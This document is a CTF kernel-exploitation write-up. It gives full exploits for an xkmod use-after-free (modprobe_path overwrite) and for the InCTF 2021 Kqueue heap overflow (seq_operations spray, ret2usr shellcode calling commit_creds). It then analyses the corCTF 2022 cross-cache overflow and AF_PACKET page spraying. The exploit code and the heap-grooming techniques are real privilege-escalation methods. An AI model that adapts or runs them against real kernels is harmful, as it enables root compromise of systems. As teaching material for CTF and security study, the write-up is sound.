#include <fcntl.h>
#include <sched.h>
#include <sys/ioctl.h>   // ioctl()
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>

#define HOME_PATH "/home/flag.sh"
char userful_shell[] = "#!/bin/sh\nchmod 777 /flag\n";

#define MODPROBE_PATH 0xffffffff82444700


struct user_arg{
size_t *buffer;
int offset, size;
}data;


void alloc_kernelmem(int dev_fd){
ioctl(dev_fd, 0x1111111, &data);
}

void get_kernelmsg(int dev_fd){
ioctl(dev_fd, 0x7777777, &data);
}

void put_usermsg(int dev_fd){
ioctl(dev_fd, 0x6666666, &data);
}


int main(void){
int dev_fd[5];
data.offset = 0;
data.size = 0x50;
data.buffer = malloc(0x100);
size_t kernel_base, kernel_offset;

int fd = open(HOME_PATH, O_RDWR|O_CREAT|O_TRUNC, 0777); // O_CREAT requires a mode argument
write(fd, userful_shell, strlen(userful_shell)); // don't write the trailing NUL into the script
close(fd);
system("chmod +x /home/flag.sh");

size_t page_offset_base;

for(int i = 0; i < 5; i++){
dev_fd[i] = open("/dev/xkmod", O_RDONLY);
}

puts("[*]Step I:Construct the UAF obj...");
alloc_kernelmem(dev_fd[0]);
memset((char *)data.buffer, 0, 0x50);
put_usermsg(dev_fd[0]);
close(dev_fd[0]);

puts("[*]Step II:Leak the Kernel base");

get_kernelmsg(dev_fd[1]);
page_offset_base = data.buffer[0]&0xfffffffff0000000; //KASLR 256MB*n
printf("[+]Get the Guessing page_offset_base: 0x%lx\n", page_offset_base);
/* Checking for the correction */
data.buffer[0] = page_offset_base + 0x9d000 - 0x10;
put_usermsg(dev_fd[1]);
alloc_kernelmem(dev_fd[2]);
alloc_kernelmem(dev_fd[3]);
get_kernelmsg(dev_fd[1]);
if((data.buffer[2]&0xfff) != 0x030){
puts("Unfortunatlly!We guess the page_offset_base failed!");
exit(1);
}
kernel_base = data.buffer[2] - 0x30;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("[+]Kernel_base :0x%lx\n", kernel_base);
printf("[+]Kernel_offset :0x%lx\n", kernel_offset);

puts("[+]Step III:Arbitrary write the modprobe_path...");
alloc_kernelmem(dev_fd[0]);
close(dev_fd[4]);
data.buffer[0] = MODPROBE_PATH + kernel_offset - 0x8;
/**/
put_usermsg(dev_fd[1]);
alloc_kernelmem(dev_fd[1]);
alloc_kernelmem(dev_fd[1]);
strcpy((char*)&(data.buffer[1]), "/home/flag.sh");
puts("[+]this is a debug...");
put_usermsg(dev_fd[1]);

puts("[+]Step IV:Handle the fake file...");

system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");
system("chmod +x /home/fake");
system("/home/fake");
}
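Step IV of the exploit prepares its files with system() calls. The sketch below does the same userland preparation in plain C; the paths and command are parameters, and the ones used in the test are hypothetical. The script is what the kernel should run as root once modprobe_path points at it. The trigger file starts with non-printable 0xff bytes. On kernels of this era, executing such a file makes the kernel fall back to request_module() for an unknown binary format, which runs the program named in modprobe_path.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write content to path and mark it executable. Returns 0 on success. */
static int write_exec_file(const char *path, const void *content, size_t len)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, content, len);
    close(fd);
    if (n != (ssize_t)len)
        return -1;
    return chmod(path, 0755);   /* umask may have stripped bits at creation */
}

/* Prepare both halves of the modprobe_path trick. */
int prepare_modprobe_trick(const char *script_path, const char *cmd, const char *trigger_path)
{
    char script[256];
    int len = snprintf(script, sizeof script, "#!/bin/sh\n%s\n", cmd);
    if (len < 0 || (size_t)len >= sizeof script)
        return -1;
    if (write_exec_file(script_path, script, (size_t)len) != 0)
        return -1;

    /* Unknown, non-printable magic: no binfmt handler will accept it. */
    static const unsigned char bad_magic[4] = {0xff, 0xff, 0xff, 0xff};
    return write_exec_file(trigger_path, bad_magic, sizeof bad_magic);
}
```

After the arbitrary write has pointed modprobe_path at script_path, executing trigger_path (for example with system(), as the exploit does) should make the kernel run the script.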

VII. Kernel Heap - Heap Overflow

Example: InCTF 2021 - Kqueue

arttnba3, quoting Scupxa0s, calls this India's Qiangwang Cup :dog:. This challenge has a pitfall with permissions: you must unpack and repack the filesystem as root, otherwise you get a kernel init error.

1. Reversing the challenge

The launch script does not enable PTI, SMEP or SMAP, so ret2usr is possible.

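Next comes the vulnerable module. We only go through it briefly here, since the challenge kindly ships the module source.

First, the data structures it uses: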

typedef struct{                                                    
uint16_t data_size;
uint64_t queue_size; /* This needs to handle larger numbers */
uint32_t max_entries;
uint16_t idx;
char* data;
}queue;

struct queue_entry{
uint16_t idx;
char *data;
queue_entry *next;
};

Their roles are fairly clear from their names.

The module also keeps a global array kqueues[] of type queue *.

/* The request structure we pass in from userland */

typedef struct{
uint32_t max_entries;
uint16_t data_size;
uint16_t entry_idx;
uint16_t queue_idx;
char* data;
}request_t;

With the data structures covered, let's look for the bug:

/* Now you have the option to safely preserve your precious kqueues */                               
static noinline long save_kqueue_entries(request_t request){

...


/* copy all possible kqueue entries */
uint32_t i=0;
for(i=1;i<request.max_entries+1;i++){
if(!kqueue_entry || !kqueue_entry->data)
break;
if(kqueue_entry->data && request.data_size)
validate(memcpy(new_queue,kqueue_entry->data,request.data_size)); //vulnerability: request.data_size is not checked against queue->data_size
else
err("[-] Internal error");
kqueue_entry = kqueue_entry->next;
new_queue += queue->data_size;
}

/* Mark the queue as saved */
isSaved[request.queue_idx] = true;
return 0;
}

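The bug is in save_kqueue_entries. When copying into new_queue, it uses the user-supplied request.data_size instead of the queue's own queue->data_size, so an arbitrary request.data_size causes a kernel heap overflow. A first idea is to spray some structure next to it and overwrite its pointers.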

One option is to use msg_msg + seq_operations to leak a kernel address. Here is a first exploitation plan, which borrows the idea from CVE-2022-0185:

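  1. Spray msg_msg objects whose payload is exactly 0x1000 + sizeof(struct seq_operations) - sizeof(struct msg_msg) - sizeof(struct msg_msgseg) bytes. This particular size prepares for the seq_operations spray in a later step.
  2. Allocate a kqueue of a specific size so that it comes from the same cache as the msg_msg, e.g. both from kmalloc-1k. With some luck, the kqueue then sits right before one of the sprayed msg_msg structures.
  3. Assuming they are adjacent, use the heap overflow to enlarge msg_msg->m_ts, then call msgrcv to read the message back. If we get more data than we sent, that msg_msg is the victim msg_msg.
  4. With the victim msg_msg we have an out-of-bounds read. Spray many struct seq_operations again and read their function pointers out of bounds to leak the kernel base.
  5. The challenge kernel is 5.8.1, so userfaultfd is still usable. During msgsnd, when the kernel reaches load_msg, we can race to modify the next pointer and get an arbitrary write, e.g. to modprobe_path.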
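The size in step 1 can be checked with a little arithmetic. This sketch assumes x86_64 sizes for a 5.x kernel: the struct msg_msg header is 0x30 bytes, the struct msg_msgseg header is 8 bytes, and struct seq_operations is four function pointers, so 0x20 bytes. It also assumes the usual SLUB kmalloc size classes. The first 0xfd0 bytes of the payload fill a 4 KB msg_msg. The remaining 0x18 bytes go into a msg_msgseg of exactly 0x20 bytes, the same size as seq_operations.

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SZ           0x1000
#define MSG_MSG_HDR_SZ    0x30  /* sizeof(struct msg_msg), assumed */
#define MSG_MSGSEG_HDR_SZ 0x8   /* sizeof(struct msg_msgseg), assumed */
#define SEQ_OPERATIONS_SZ 0x20  /* four function pointers */

/* Generic kmalloc cache a request of sz bytes lands in (x86_64 SLUB classes). */
size_t kmalloc_bucket(size_t sz)
{
    static const size_t classes[] = {8, 16, 32, 64, 96, 128, 192, 256, 512,
                                     1024, 2048, 4096, 8192};
    for (size_t i = 0; i < sizeof classes / sizeof classes[0]; i++)
        if (sz <= classes[i])
            return classes[i];
    return 0; /* larger requests bypass the kmalloc caches */
}

/* msgsnd() payload length from step 1. */
size_t spray_msg_len(void)
{
    return PAGE_SZ + SEQ_OPERATIONS_SZ - MSG_MSG_HDR_SZ - MSG_MSGSEG_HDR_SZ;
}

/* How load_msg() splits a payload (single msg_msgseg assumed). */
void msg_alloc_sizes(size_t len, size_t *msg_sz, size_t *seg_sz)
{
    size_t first = len < PAGE_SZ - MSG_MSG_HDR_SZ ? len : PAGE_SZ - MSG_MSG_HDR_SZ;
    *msg_sz = MSG_MSG_HDR_SZ + first;
    *seg_sz = len > first ? MSG_MSGSEG_HDR_SZ + (len - first) : 0;
}
```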

But after reading other players' writeups, I realized I had been a clown :(

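The challenge actually offers a second bug: an integer overflow. When a queue is created, request.max_entries is never validated. If we pass max_entries = 0xffffffff, max_entries + 1 wraps to 0 in 32-bit arithmetic, so space becomes 0: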

if(__builtin_umulll_overflow(sizeof(queue_entry),(request.max_entries+1),&space) == true)
err("[-] Integer overflow");

So the queue gets only sizeof(struct queue), i.e. 0x20 bytes. That naturally suggests seq_operations, which is also 0x20 bytes, as the target structure.
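Both numbers can be reproduced in userland. This sketch uses hypothetical mirrors of the module's structs (x86_64, 8-byte pointers) and re-creates the size computation with the same GCC builtin. The final queue_size = space + sizeof(queue) is an assumption about the module source, consistent with the 0x20 stated above.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical mirrors of the module's structures, same field order as the source. */
typedef struct queue_entry queue_entry;
struct queue_entry {
    uint16_t idx;
    char *data;
    queue_entry *next;
};

typedef struct {
    uint16_t data_size;
    uint64_t queue_size;
    uint32_t max_entries;
    uint16_t idx;
    char *data;
} queue;

/* The "+1" happens in 32-bit arithmetic, so 0xffffffff wraps to 0 before the
 * overflow-checked multiplication ever sees it. */
int kqueue_alloc_size(uint32_t max_entries, unsigned long long *out)
{
    unsigned long long space = 0;
    uint32_t n = max_entries + 1;
    if (__builtin_umulll_overflow(sizeof(queue_entry), n, &space))
        return -1;                      /* the module's "Integer overflow" path */
    *out = space + sizeof(queue);       /* assumed: queue_size = sizeof(queue) + space */
    return 0;
}
```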

2. Exploitation

The overall flow is quite simple:

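  1. Use the first bug: create a queue with max_entries = 0xffffffff. This yields a queue that consists only of the queue header, with no queue_entry.
  2. The data buffer passed at creation holds pointers to our shellcode.
  3. Use the second bug, the heap overflow in save_kqueue_entries. Since queue_size covers only one struct queue (0x20 bytes), we spray lots of seq_operations structures to get one adjacent to new_queue.
  4. Assume that, after the spray, one seq_operations sits right after new_queue (in practice this is very likely). The heap overflow then overwrites seq_operations->start with our shellcode address, and the next read on the corresponding fd calls it.
  5. Because of KASLR we still need the kernel base. As in userland pwn, we look on the stack for a suitable address, and there is indeed a stable kernel address there. So we write our own shellcode that computes the base from it and calls commit_creds(prepare_kernel_cred(NULL)).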
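The hand-written shellcode in the exploit does two things worth spelling out. This sketch uses the offsets hard-coded in the exploit (0x201179, 0x8c580, 0x8c140), which are valid only for this challenge's kernel. First, the shellcode derives prepare_kernel_cred and commit_creds from the kernel pointer at [rsp+8]; leak - 0x201179 is presumably the kernel base. Second, it builds the frame that iretq pops, lowest address first. Since it pushes ss, rsp, rflags, cs and finally rip, rip ends up on top, matching the struct order below.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The frame iretq pops, lowest address first. */
struct iretq_frame {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
};

struct kaddrs {
    uint64_t base;
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
};

/* Same arithmetic as the shellcode: r14 = leak - 0x201179, then fixed offsets. */
struct kaddrs resolve_from_stack_leak(uint64_t leak)
{
    struct kaddrs k;
    k.base = leak - 0x201179;
    k.prepare_kernel_cred = k.base + 0x8c580;
    k.commit_creds = k.base + 0x8c140;
    return k;
}
```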

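There is a big pitfall, though. In my VM, the usual final system("/bin/sh") fails with an error. At first I blamed stack misalignment, but adjusting the stack did not help. While experimenting, I noticed that the shell was -sh, which I did not fully understand.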

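A new shell was indeed started, and reaching that point means the uid check had passed, so we really were root. Yet the flag still could not be read. I suspect the configuration in the filesystem's init script (below), but I could not figure it out.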

# use the /dev/console device node from devtmpfs if possible to not      
# confuse glibc's ttyname_r().
# This may fail (E.G. booted with console=), and errors from exec will
# terminate the shell, so use a subshell for the test
if (exec 0</dev/console) 2>/dev/null; then
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
fi

In the end I took a shortcut: instead of escalating to a root shell, the exploit simply prints the flag. The exploit:

// Build (assumption): gcc -static -masm=intel exp.c -o exp
// saveStatus() and shellcode() use Intel-syntax inline asm, so -masm=intel is required.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/ioctl.h>   // ioctl()
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>



struct user_request{
uint32_t max_entries;
uint16_t data_size;
uint16_t entry_idx;
uint16_t queue_idx;
char* data;
};

struct queue{
uint16_t data_size;
uint64_t queue_size; /* This needs to handle larger numbers */
uint32_t max_entries;
uint16_t idx;
char* data;

};

#define CREATE_KQUEUE 0xDEADC0DE
#define EDIT_KQUEUE 0xDAADEEEE
#define DELETE_KQUEUE 0xBADDCAFE
#define SAVE 0xB105BABE

int dev_fd;

size_t user_cs, user_ss,user_rflags,user_sp;

void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m Status has been saved . \033[0m");
}

size_t root_shell;
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
void info_log(char* str){
printf("\033[0m\033[1m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}


void get_root_shell(){
if(getuid()){
error_log("Failed to get root shell...");
}
info_log("I will get root shell...");
system("cat /flag");
info_log("You got my shell :)");
exit(0);
}

void create_kqueue(uint32_t maxentries, uint16_t datasize){
struct user_request request = {
.max_entries = maxentries,
.data_size = datasize,
};
ioctl(dev_fd, CREATE_KQUEUE, &request);
}

void edit_kqueue(uint16_t queue_idx, uint16_t entry_idx, char *data){
struct user_request request = {
.queue_idx = queue_idx,
.entry_idx = entry_idx,
.data = data,
};
ioctl(dev_fd, EDIT_KQUEUE, &request);
}

void delete_kqueue(uint16_t idx){
struct user_request request = {
.queue_idx = idx,
};
ioctl(dev_fd, DELETE_KQUEUE, &request);
}

void save_kqueue(uint16_t idx, uint32_t maxentries, uint16_t datasize){
struct user_request request = {
.queue_idx = idx,
.max_entries = maxentries,
.data_size = datasize,
};
ioctl(dev_fd, SAVE, &request);
}

size_t middle_rsp;
void shellcode(){
__asm__(
"mov r14, [rsp + 0x8];"
"sub r14, 0x201179;"
"mov r13, r14;"
"add r13, 0x8c580;"
"mov r12, r14;"
"add r12, 0x8c140;"
"mov rdi, 0;"
"call r13;"
"mov rdi, rax;"
"call r12;"
"swapgs;"
"mov r14, user_ss;"
"push r14;"
"mov r14, middle_rsp;"
"push r14;"
"mov r14, user_rflags;"
"push r14;"
"mov r14, user_cs;"
"push r14;"
"mov r14, root_shell;"
"push r14;"
"iretq;"
);
}


int main(void){
saveStatus();

middle_rsp = user_sp + 0x8;
root_shell = (size_t)get_root_shell;
size_t data[0x20];
int seq_fd[0x200];
info_log("Step I:Create a queue without any queue_entry :)");
dev_fd = open("/dev/kqueue", O_RDONLY);
create_kqueue(0xffffffff, 0x20*8); //queue->data will hold many shellcode addresses


for(int i = 0; i < 0x20; i++){
data[i] = (size_t)shellcode;
}
edit_kqueue(0, 0, (char *)data);
info_log("Step II:Spraying the seq_operations!");
for(int i = 0; i < 0x200; i++){
seq_fd[i] = open("/proc/self/stat", O_RDONLY);
}
printf("the get shell addr is :0x%lx\n", (size_t)get_root_shell);
info_log("Step III:Overwrite 0x20 bytes...");
save_kqueue(0, 0, 0x40);
for(int i= 0; i < 0x200; i++){
read(seq_fd[i], data, 0x8);
}
}

VIII. Kernel Heap - Cross Cache Overflow

Example: corCTF 2022 - cache of castaways

The challenge first gives a README, so let's take a look. The author, BitsByWill, gives this hint:

After repeated attacks on poor kernel objects, I’ve decided to place pwners in a special isolated place - a marooned region of memory. Good luck escaping out of here :^)

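The meaning is clear: the kernel master is no longer satisfied with exploiting generic objects and tells us outright that we must exploit from inside an isolated environment. Scary :^(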

1. Reversing the challenge

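The official writeup includes the full source, so there is no need to recreate the contest conditions, and we can focus directly on exploitation. Thanks to BitsByWill for also providing the kernel config and a kernel image with debug symbols, which saves a lot of unnecessary trouble later on.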

First, the launch script:

#!/bin/sh

exec qemu-system-x86_64 \
-m 4096M \
-nographic \
-kernel bzImage \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \
-netdev user,id=net \
-device e1000,netdev=net \
-no-reboot \
-monitor /dev/null \
-cpu qemu64,+smep,+smap \
-initrd initramfs.cpio.gz \

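4 GB of RAM, with SMEP, SMAP and KPTI enabled.

Honestly there was no need to check: of course every protection is on orz

Next, the filesystem's init script loads the vulnerable module we need to analyze, cache_of_castway.ko.

Boot it up! Looks great.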

init_castaway_driver

First, the init function:

#define OVERFLOW_SZ 0x6

#define CHUNK_SIZE 512
#define MAX 8 * 50

struct castaway_cache
{
char buf[CHUNK_SIZE];
};

static int init_castaway_driver(void)
{
castaway_dev.minor = MISC_DYNAMIC_MINOR;
castaway_dev.name = DEVICE_NAME;
castaway_dev.fops = &castaway_fops;
castaway_dev.mode = 0644;
mutex_init(&castaway_lock);
if (misc_register(&castaway_dev))
{
return -1;
}
castaway_arr = kzalloc(MAX * sizeof(castaway_t *), GFP_KERNEL); //array of 400 castaway_t pointers
if (!castaway_arr)
{
return -1;
}
castaway_cachep = KMEM_CACHE(castaway_cache, SLAB_PANIC | SLAB_ACCOUNT); //the author's own isolated kmem_cache
if (!castaway_cachep)
{
return -1;
}
printk(KERN_INFO "All alone in an castaway cache... \n");
printk(KERN_INFO "There's no way a pwner can escape!\n");
return 0;
}

KMEM_CACHE is a macro that creates a kmem_cache:

/*
* Please use this macro to create slab caches. Simply specify the
* name of the structure and maybe some flags that are listed above.
*
* The alignment of the struct determines object alignment. If you
* f.e. add ____cacheline_aligned_in_smp to the struct declaration
* then the objects will be properly aligned in SMP configurations.
*/
#define KMEM_CACHE(__struct, __flags) \
kmem_cache_create(#__struct, sizeof(struct __struct), \
__alignof__(struct __struct), (__flags), NULL)

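The kmem_cache's objects are 512 bytes. Note that the kmem_cache is created with SLAB_ACCOUNT | SLAB_PANIC. The kernel config has CONFIG_MEMCG_KMEM=y, so slabs created from this kmem_cache go into a separate slab pool, which gives a fully isolated environment. To make the isolation truly "complete", CONFIG_SLAB_MERGE_DEFAULT is also disabled in the config. This prevents find_mergeable() from reusing an existing kmem_cache with similar flags and size.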

castaway_ioctl

typedef struct
{
int64_t idx;
uint64_t size;
char *buf;
}user_req_t;

static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
user_req_t req;
long ret = 0;

if (cmd != ALLOC && copy_from_user(&req, (void *)arg, sizeof(req)))
{
return -1;
}
mutex_lock(&castaway_lock);
switch (cmd)
{
case ALLOC:
ret = castaway_add();
break;
case EDIT:
ret = castaway_edit(req.idx, req.size, req.buf);
break;
default:
ret = -1;
}
mutex_unlock(&castaway_lock);
return ret;
}

This defines the user argument format. ioctl implements two operations. Next:

castaway_add

static long castaway_add(void)
{
int idx;
if (castaway_ctr >= MAX)
{
goto failure_add;
}
idx = castaway_ctr++;
castaway_arr[idx] = kmem_cache_zalloc(castaway_cachep, GFP_KERNEL_ACCOUNT);

if (!castaway_arr[idx])
{
goto failure_add;
}

return idx;

failure_add:
printk(KERN_INFO "castaway chunk allocation failed\n");
return -1;
}

It allocates an object from the dedicated kmem_cache and stores its address in the global object array.

castaway_edit

typedef struct
{
char pad[OVERFLOW_SZ];
char buf[];
}castaway_t;

static long castaway_edit(int64_t idx, uint64_t size, char *buf)
{
char temp[CHUNK_SIZE];
if (idx < 0 || idx >= MAX || !castaway_arr[idx])
{
goto edit_fail;
}
if (size > CHUNK_SIZE || copy_from_user(temp, buf, size))
{
goto edit_fail;
}
memcpy(castaway_arr[idx]->buf, temp, size);

return size;

edit_fail:
printk(KERN_INFO "castaway chunk editing failed\n");
return -1;
}

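Every memcpy writes starting at byte 6 of the object (castaway_arr[idx]->buf skips the 6-byte pad) and may copy a full chunk of up to 512 bytes, so there is a 6-byte overflow past the end of the object.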
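A quick check of the overflow size. This sketch reuses the module's castaway_t layout and constants. The write starts at offset 6 and may be up to CHUNK_SIZE bytes long, so at most 6 bytes spill past the 512-byte object.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define OVERFLOW_SZ 0x6
#define CHUNK_SIZE  512

/* Same layout as the module's castaway_t: buf starts 6 bytes into the object. */
typedef struct {
    char pad[OVERFLOW_SZ];
    char buf[];
} castaway_t;

/* Bytes that castaway_edit(idx, size, ...) writes past the end of its object. */
size_t castaway_overflow(uint64_t size)
{
    if (size > CHUNK_SIZE)              /* rejected by the module */
        return 0;
    size_t end = offsetof(castaway_t, buf) + size;
    return end > CHUNK_SIZE ? end - CHUNK_SIZE : 0;
}
```

Assume the next page happens to start with a struct cred (the goal of the layout described later) and that it uses the usual 5.x layout without CONFIG_DEBUG_CREDENTIALS. Then those 6 bytes cover the 4-byte usage and the low 2 bytes of uid.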

Checking the config again, these two good buddies are enabled as well:

CONFIG_SLAB_FREELIST_RANDOM=y    
CONFIG_SLAB_FREELIST_HARDENED=y

2. Exploitation approach

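As the author says, nearly every kernel protection is enabled. On top of that, the module's kmem_cache is isolated and cannot be merged, the objects contain no pointers, and a free object's freelist pointer is placed in the middle of the object rather than at its start. All we have is a 6-byte overflow. It looks hopeless, but is there a way to break out of this cage?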

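There is. Since our objects are isolated, we cannot use objects from other kmem_caches directly. But look one level lower. Beneath the SLUB allocator, the Linux kernel has another allocator, the buddy system, which hands out every page-granular allocation, and our kmem_cache's slabs are no exception. With the right layout, we can make slabs of different kmem_caches adjacent. Then we can overflow out of an object in the isolated kmem_cache into an object of another cache!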

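That is the rough picture. Even if our vulnerable kmem_cache is isolated from the generic kmem_caches, we can still use the fact that the buddy system hands out contiguous blocks to overflow between different structures. For details of this technique, see the following posts: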

AUTOSLAB's countermeasures against cross-cache exploitation

CVE-2022-27666 Page-Level heap fengshui

Google project zero CVE-2017-7308

BitsByWill also recommends that post.

Intuitively, it is as if the objects we usually work with were moved up one level, to whole slabs.

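When a slab page is released back to the buddy system, it will be reused at some later point, since the kernel is expected to recycle that memory. The cross-cache overlapping technique frees every memory slot in a slab page (the objects we usually talk about) to force the slab page itself to be freed. It then sprays objects of another type so that new slab pages are allocated and the freed slab page is reclaimed. If the attack succeeds, the memory of the freed object is occupied by an object of another type. In the past, cross-cache attacks were rare in exploits of Linux kernel memory-safety bugs. In general-purpose caches they are not only unnecessary but also unstable. In frequently used general-purpose caches especially, the attack suffers from noise caused by uncontrollable allocations, i.e. many different structure types being allocated in the meantime. For example, when the kernel makes an unknown allocation, freeing every memory slot of a slab page fails, so the page cannot be reclaimed by another slab. Compared with cross-cache attacks on general-purpose caches, a dedicated object cache has almost no noise. Every allocation goes to its own cache, including unknown allocations made by the kernel, which makes unknown allocations in the cache unlikely. This lets the attacker reliably free a dedicated cache's slab pages and carry out the cross-cache attack.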

Seen this way, the dedicated cache is both a challenge and a gift for us~

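Since we plan to overflow across caches, we first need to spray our vulnerable object and also the victim object. We must make sure that a slab holding victim objects sits immediately after (at the next higher address than) a slab holding vulnerable objects.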

How do we achieve that? With Page-Level heap fengshui, i.e. page-level heap feng shui.

3. Page-level allocation primitive

This section follows the Google Project Zero writeup.

AF_PACKET socket basics

First, a basic explanation of AF_PACKET sockets:

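AF_PACKET sockets allow users to send or receive packets at the device driver level. To create an AF_PACKET socket, a process must have the CAP_NET_RAW capability in the user namespace that governs its network namespace. Note that if the kernel enables unprivileged user namespaces, unprivileged users can create packet sockets.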

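Most people know them as what tcpdump uses to sniff packets on a network interface. The Google team gives an example that uses strace to trace the system calls made by the following command: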

# strace tcpdump -i eth0
...
socket(PF_PACKET, SOCK_RAW, 768) = 3
...
bind(3, {sa_family=AF_PACKET, proto=0x03, if2, pkttype=PACKET_HOST, addr(0)={0, }, 20) = 0
...
setsockopt(3, SOL_PACKET, PACKET_VERSION, [1], 4) = 0
...
setsockopt(3, SOL_PACKET, PACKET_RX_RING, {block_size=131072, block_nr=31, frame_size=65616, frame_nr=31}, 16) = 0
...
mmap(NULL, 4063232, PROT_READ|PROT_WRITE, MAP_SHARED, 3, 0) = 0x7f73a6817000
...

I am not showing output from my own VM because its eth0 barely sends or receives any packets (just kidding).

It then lists the concrete steps:

  1. Create a socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)).
  2. Bind the socket to the eth0 interface.
  3. Set the ring buffer version to TPACKET_V2 with the PACKET_VERSION socket option.
  4. Create the ring buffer with the PACKET_RX_RING socket option.
  5. Map the ring buffer into user space.

After this sequence of system calls, the kernel puts packets passing through eth0 into the ring buffer, and tcpdump reads them from the buffer's user-space mapping.

AF_PACKET sockets inside the kernel

When we create an AF_PACKET socket, the kernel creates the following structure:

struct packet_sock {
/* struct sock has to be the first member of packet_sock */
struct sock sk;

...

struct packet_ring_buffer rx_ring; //created with the PACKET_RX_RING (receive) setsockopt option
struct packet_ring_buffer tx_ring; //created with the PACKET_TX_RING (transmit) setsockopt option

...

enum tpacket_versions tp_version; //sets the ring buffer version

...

int (*xmit)(struct sk_buff *skb);

...
};

Below is the ring buffer structure, struct packet_ring_buffer:

struct pgv {
char *buffer;
};

struct packet_ring_buffer {
struct pgv *pg_vec;

...

union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

The pg_vec field points to an array of struct pgv, and each struct pgv holds a pointer to one block, as shown in the Google team's figure.

Next, the ring buffer's prb_bdqc field:

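/* kbdq - kernel block descriptor queue */
struct tpacket_kbdq_core {

...

unsigned short blk_sizeof_priv; //size of the private area in each block

...

char *nxt_offset; //points into the active block, at the place where the next packet will be stored

...

struct timer_list retire_blk_timer; //timer that retires the current block on timeout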
};

struct timer_list {
struct hlist_node entry;
unsigned long expires;
void (*function)(struct timer_list *);
u32 flags;

#ifdef CONFIG_LOCKDEP
struct lockdep_map lockdep_map;
#endif
};

Creating the ring buffer in packet_set_ring()

Socket events are generally handled by packet_setsockopt() together with a specific socket option. For example, PACKET_VERSION sets the ring buffer version.

When we set PACKET_RX_RING to create the receive ring buffer, the request is eventually handled by packet_set_ring(). The important parts follow.

First it performs a series of checks:

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;
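To see which requests survive these checks, here is a userland re-check for TPACKET_V1/V2; the V3-only tp_sizeof_priv check is left out. struct ring_req is a hypothetical mirror of struct tpacket_req, and min_frame_size stands for tp_hdrlen + tp_reserve. The zero guards are added for the sketch: in the kernel, this block sits under if (req->tp_block_nr), and min_frame_size is never 0.

```c
#include <assert.h>
#include <limits.h>
#include <stdbool.h>

#define PAGE_SZ           4096u
#define TPACKET_ALIGNMENT 16u

/* Hypothetical mirror of struct tpacket_req (same field order). */
struct ring_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

bool ring_req_ok(const struct ring_req *r, unsigned int min_frame_size)
{
    if (r->tp_block_nr == 0 || r->tp_frame_size == 0)
        return false;                                    /* sketch-only guards */
    if ((int)r->tp_block_size <= 0 || r->tp_block_size % PAGE_SZ != 0)
        return false;                                    /* positive, PAGE_ALIGNED */
    if (r->tp_frame_size < min_frame_size)
        return false;
    if (r->tp_frame_size & (TPACKET_ALIGNMENT - 1))
        return false;
    unsigned int per_block = r->tp_block_size / r->tp_frame_size;
    if (per_block == 0 || per_block > UINT_MAX / r->tp_block_nr)
        return false;
    return per_block * r->tp_block_nr == r->tp_frame_nr;
}
```

A simple spray-friendly choice is one page-sized frame per page, so tp_frame_nr = (tp_block_size / 4096) * tp_block_nr.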

Then it allocates the blocks for the ring buffer:

err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
if (unlikely(!pg_vec))
goto out;

alloc_pg_vec actually calls the kernel's page allocator. Note that it allocates block_nr blocks of the given order, and the order is derived from our tp_block_size, which is why BitsByWill stresses that field.

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
...

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);

...
}

static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

...
}
